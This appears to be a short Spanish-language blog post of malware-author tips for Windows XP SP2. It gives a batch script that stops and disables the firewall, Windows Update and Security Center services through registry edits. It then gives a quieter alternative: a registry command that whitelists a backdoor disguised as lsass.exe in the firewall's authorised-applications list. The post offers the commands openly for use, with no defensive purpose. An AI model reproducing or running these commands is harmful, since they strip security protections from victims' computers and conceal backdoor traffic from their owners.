Codigo
@echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
Con esto, el firewall del XP Sp2 se keda "out".
------------------------------------------------------
si lo deshabilitas el sistema da una alarma es mejor agregar tu
aplicacion a la lista de los que tienen salida, o agregar un rango de
puertos es mas silencioso
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v C:\WINDOWS\lsass.exe /t REG_SZ /d "C:\WINDOWS\lsass.exe:*:Enabled:lsass" /f
en ese ejemplo se le dio permisos a un backdoor camuflajeado como lsass.exe
Entradas
No hay comentarios:
Publicar un comentario